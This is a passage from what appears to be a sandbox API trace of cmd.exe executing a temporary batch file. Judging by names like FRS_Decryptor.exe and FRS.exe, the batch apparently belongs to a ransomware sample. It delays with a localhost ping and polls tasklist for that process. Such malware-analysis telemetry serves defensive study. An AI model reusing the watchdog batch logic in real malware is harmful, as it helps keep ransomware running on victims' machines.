lpDistanceToMoveHigh=0x0) returned 0x9b5 [0094.170] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.170] GetFileType (hFile=0x158) returned 0x1 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0094.170] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0094.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0094.170] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.170] GetFileType (hFile=0x158) returned 0x1 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0094.170] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0094.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0094.170] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.170] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0094.170] _get_osfhandle (_FileHandle=0) returned 0x24 [0094.170] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0094.170] SetConsoleInputExeNameW () returned 0x1 [0094.170] GetConsoleOutputCP () returned 0x1b5 [0094.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0094.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.171] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.171] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0094.171] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.171] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0094.171] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0094.171] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0094.171] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0094.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0094.171] GetFileType (hFile=0x158) returned 0x1 [0094.171] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.171] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0094.171] _tell (_FileHandle=3) returned 2512 [0094.171] _close (_FileHandle=3) returned 0 [0094.171] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0094.171] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0094.171] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0094.171] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0094.171] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0094.172] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0094.172] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0094.172] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0094.172] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0094.172] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0094.172] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0094.172] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0094.172] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0094.172] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0094.172] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0094.172] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0094.172] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0094.172] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0094.172] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0094.172] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0094.172] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0094.172] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0094.172] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0094.172] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0094.172] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0094.172] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0094.172] _wcsicmp (_String1="ping", _String2="START") returned -3 [0094.172] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0094.172] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0094.172] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0094.172] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0094.172] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0094.172] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0094.172] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0094.172] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0094.172] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0094.172] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0094.172] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0094.172] SetErrorMode (uMode=0x0) returned 0x0 [0094.172] SetErrorMode (uMode=0x1) returned 0x0 [0094.172] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0094.172] SetErrorMode (uMode=0x0) returned 0x1 [0094.172] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.172] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.172] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.172] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.173] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0094.173] GetLastError () returned 0x2 [0094.173] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.173] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0094.173] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0094.173] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0094.173] GetLastError () returned 0x2 [0094.173] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0094.173] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0094.173] GetFileType (hFile=0x28) returned 0x2 [0094.173] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0094.173] _dup (_FileHandle=1) returned 3 [0094.173] _close (_FileHandle=1) returned 0 [0094.173] _wcsicmp (_String1="nul", _String2="con") returned 11 [0094.173] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0094.173] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0094.173] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0094.174] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0094.174] SetErrorMode (uMode=0x0) returned 0x0 [0094.174] SetErrorMode (uMode=0x1) returned 0x0 [0094.174] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0094.174] SetErrorMode (uMode=0x0) returned 0x1 [0094.174] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.174] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.174] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.174] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.174] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0094.174] GetLastError () returned 0x2 [0094.174] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.174] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a170 [0094.174] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0094.174] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0094.174] GetLastError () returned 0x2 [0094.174] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0094.174] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0094.175] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0094.175] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0094.175] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0094.175] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.175] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.176] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.176] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0094.176] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x2a0, dwProcessId=0x860, dwThreadId=0x848)) returned 1 [0094.178] CloseHandle (hObject=0x2a0) returned 1 [0094.178] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.178] GetEnvironmentStringsW () returned 0xd30508* [0094.178] FreeEnvironmentStringsA (penv="=") returned 1 [0094.179] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0096.231] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0096.231] CloseHandle (hObject=0x36c) returned 1 [0096.231] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0096.231] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0096.231] GetEnvironmentStringsW () returned 0xd2c668* [0096.231] FreeEnvironmentStringsA (penv="=") returned 1 [0096.231] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0096.231] GetEnvironmentStringsW () returned 0xd30508* [0096.232] FreeEnvironmentStringsA (penv="=") returned 1 [0096.232] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0096.232] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0096.232] _close (_FileHandle=3) returned 0 [0096.232] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.232] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0096.232] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.232] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0096.232] _get_osfhandle (_FileHandle=0) returned 0x24 [0096.232] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0096.232] SetConsoleInputExeNameW () returned 0x1 [0096.233] GetConsoleOutputCP () returned 0x1b5 [0096.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0096.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.233] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0096.233] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0096.233] _get_osfhandle (_FileHandle=3) returned 0x158 [0096.233] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0096.233] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0096.233] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0096.233] SetFilePointer (in: hFile=0x158, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0096.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0096.234] GetFileType (hFile=0x158) returned 0x1 [0096.234] _get_osfhandle (_FileHandle=3) returned 0x158 [0096.234] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0096.234] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0096.234] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0096.234] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0096.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0096.234] GetFileType (hFile=0x158) returned 0x1 [0096.234] _get_osfhandle (_FileHandle=3) returned 0x158 [0096.234] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0096.234] _tell (_FileHandle=3) returned 2627 [0096.234] _close (_FileHandle=3) returned 0 [0096.234] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0096.234] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0096.234] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0096.234] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0096.234] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0096.238] feof (_File=0x76ea4c68) returned 0 [0096.238] ferror (_File=0x76ea4c68) returned 0 [0096.238] fgets (in: _Buf=0xd82ec0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0096.704] feof (_File=0x76ea4c68) returned 0 [0096.704] ferror (_File=0x76ea4c68) returned 0 [0096.704] fgets (in: _Buf=0xd85d26, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0096.743] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0096.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0096.743] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0096.743] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.744] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0096.744] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0096.744] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] GetFileType (hFile=0x260) returned 0x1 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, 